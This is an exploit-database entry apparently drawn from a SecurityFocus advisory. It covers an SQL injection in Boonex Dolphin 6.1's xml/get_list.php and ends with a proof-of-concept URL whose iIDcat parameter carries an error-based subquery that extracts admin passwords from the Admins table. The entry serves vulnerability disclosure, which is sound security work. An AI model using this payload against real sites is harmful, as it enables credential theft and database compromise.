Boonex Dolphin 6.1 - 'get_list.php' SQL Injection
Author: Yuri Goltsev
type: webapps
platform: php
port:
date_added: 2011-10-19
date_updated: 2016-12-13
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/50286/info
Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.
http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) )